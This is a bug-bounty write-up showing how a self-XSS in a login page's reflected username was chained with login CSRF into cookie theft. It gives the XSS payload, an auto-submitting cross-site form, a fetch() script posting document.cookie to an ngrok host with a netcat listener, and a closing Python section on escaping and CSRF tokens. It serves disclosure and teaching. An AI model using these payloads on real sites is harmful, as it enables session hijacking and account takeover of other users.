
# From Self-XSS to Account Takeover (ATO)

<figure><img src="https://miro.medium.com/v2/resize:fit:388/1*Wfb593bpG6-Ywg9xi_XX2w.jpeg" alt="" height="162" width="310"><figcaption></figcaption></figure>

Hello there,

I'm Mostafa Elguerdawi. Today I would like to share one of my recent findings in a [HackerOne](https://medium.com/u/6f816e37be2c?source=post_page-----812c194b61cf--------------------------------) program.

Let's call the target https://reacted.com.

While testing this site, I found a login function and, as usual, tried to bypass it using response manipulation, default credentials, and SQL injection.

Nothing worked, so I examined the page source and found that the username I had just entered was reflected inside the `value` attribute of the input field.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*h5P8coYMD8zy71DBlA4rqg.png" alt="" height="110" width="700"><figcaption></figcaption></figure>

That made me think of XSS, so I injected a double quote (`"`) in the username and found that it was not filtered.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*DRg51_UYIKs84aEtqO_nog.png" alt="" height="109" width="700"><figcaption></figcaption></figure>

So I tried injecting `<` as well, which might also be reflected unfiltered.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*4tK6n3YnAISGqvVCK5AEtg.png" alt="" height="101" width="700"><figcaption></figcaption></figure>

Indeed, it worked!

So I tried injecting a complete payload:

```html
"> <svg/onload=alert("XSS")>
```

And it also succeeded!

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*28mX7_zTvPpuWcYAgA9Taw.png" alt="" height="144" width="700"><figcaption></figcaption></figure>

Unfortunately, this is only a self-XSS: the payload is reflected back to the same user who typed it.

## Escalation phase <a href="#id-446d" id="id-446d"></a>

I ran my Burp Suite and intercepted the request during the login attempt.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*T9NA0WqKk8YOFYpDqmioaQ.png" alt="" height="673" width="700"><figcaption></figcaption></figure>

From the request, I noticed that there is no CSRF protection, which is not unusual for a login function.

I attempted to escalate the self-XSS to a reflected XSS by delivering the malicious username through a login CSRF.

The payload used:

```html
<html>
  <body>
    <!-- Cross-site form that logs the victim in with the XSS payload as the username -->
    <form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">
      <!-- &#x22;&#x20; decodes to a double quote and a space when the browser reads the attribute -->
      <input type="hidden" name="loginName" value="&#x22;&#x20;><svg/onmouseover=alert(1)&#x20;&#x22;>"/>
      <input type="hidden" name="loginPassword" value="test"/>
      <input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>
    </form>
    <script>
      // Auto-submit the form as soon as the page has loaded
      document.addEventListener('DOMContentLoaded', function(event) {
        document.createElement('form').submit.call(document.getElementById('myForm'));
      });
    </script>
  </body>
</html>
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*9tCKYGM8ADDNtWvltqizYQ.png" alt="" height="244" width="700"><figcaption></figcaption></figure>

Yes, it worked!

With the help of ngrok, I could then receive the cookies of any user who opens the page.

I opened two terminal tabs:

First: `ngrok http 80`

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*hS9KVJcKrU5P3nJa3Nul4g.png" alt="" height="219" width="700"><figcaption></figcaption></figure>

Second: `sudo nc -nlvp 80`

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*7BNnxG7qGkvIpAWo_eBAg.png" alt="" height="134" width="700"><figcaption></figcaption></figure>

I used this payload in the username:

```html
&#x22;&#x20;> <script>&#x0a;fetch('https://<ngrok-Domain>', { method: 'POST', mode: 'no-cors', body:document.cookie });&#x0a;</script>&#x20;&#x22;
```

`&#x22;&#x20;` is a double quote and a space encoded as HTML entities (and `&#x0a;` is a newline); the browser decodes them when it reads the form's `value` attribute, so the decoded characters are what gets submitted.

This payload reads the user's cookies and sends them to my ngrok endpoint, where netcat (nc) receives them.

Final payload:

```html
<html>
 <body>
  <form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">
   <!-- Username field carries the cookie-exfiltrating script, HTML-entity encoded -->
   <input type="hidden" name="loginName" value="&#x22;&#x20;> <script>&#x0a;fetch('https://<ngrok-host>', { method: 'POST', mode: 'no-cors', body:document.cookie });&#x0a;</script>&#x20;&#x22;"/>
   <input type="hidden" name="loginPassword" value="test"/>
   <input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>
  </form>
  <script>
   // Auto-submit the form as soon as the page has loaded
   document.addEventListener('DOMContentLoaded', function(event) {
    document.createElement('form').submit.call(document.getElementById('myForm'));
    });
  </script>
 </body>
</html>
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*fm0K9T7mLZYzBEVt9_DxbQ.png" alt="" height="169" width="700"><figcaption></figcaption></figure>

Finally, I managed to obtain the cookies.
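The two defects that made this chain work are the unescaped reflection of `loginName` into a `value` attribute and the missing CSRF token on the login POST. The following is an added example (not code from the write-up or the affected program) that reproduces the vulnerable rendering beside a hardened version, checks whether a submitted value broke out of the attribute, and issues a session-bound pre-login CSRF token; `SERVER_KEY`, the function names and the sample inputs are all constructed here.

```python
import hmac
import html
import secrets
from hashlib import sha256
from html.parser import HTMLParser

# Constructed sample inputs: a normal username and the breakout payload from the write-up.
NORMAL_NAME = "alice"
BREAKOUT = '"> <svg/onload=alert("XSS")>'

# Hypothetical per-deployment secret; in production load it from a secret store.
SERVER_KEY = secrets.token_bytes(32)


def render_login_vulnerable(login_name: str) -> str:
    """Reproduces the bug: the submitted loginName is pasted into value="" unescaped."""
    return f'<input type="text" name="loginName" value="{login_name}">'


def render_login_hardened(login_name: str, csrf_token: str) -> str:
    """Attribute-encode the reflected value and bind the form to a CSRF token."""
    safe_name = html.escape(login_name, quote=True)   # & < > " ' become entities
    safe_token = html.escape(csrf_token, quote=True)
    return (
        f'<input type="hidden" name="csrf" value="{safe_token}">'
        f'<input type="text" name="loginName" value="{safe_name}">'
    )


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(rendered: str) -> list:
    """Start tags other than the expected <input>; a non-empty list means the value broke out."""
    parser = _TagCollector()
    parser.feed(rendered)
    return [t for t in parser.tags if t != "input"]


def issue_csrf_token(session_id: str) -> str:
    """Pre-login token bound to the anonymous session cookie; a third-party page
    cannot read that cookie, so it cannot produce a valid token for the login POST."""
    return hmac.new(SERVER_KEY, session_id.encode(), sha256).hexdigest()


def verify_login_request(session_id: str, submitted_token: str) -> bool:
    return hmac.compare_digest(issue_csrf_token(session_id), submitted_token)
```

Rejecting a login POST whose token does not verify against the requester's own session cookie is what stops the cross-site form above from ever reaching the vulnerable (or hardened) renderer with attacker-chosen input.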
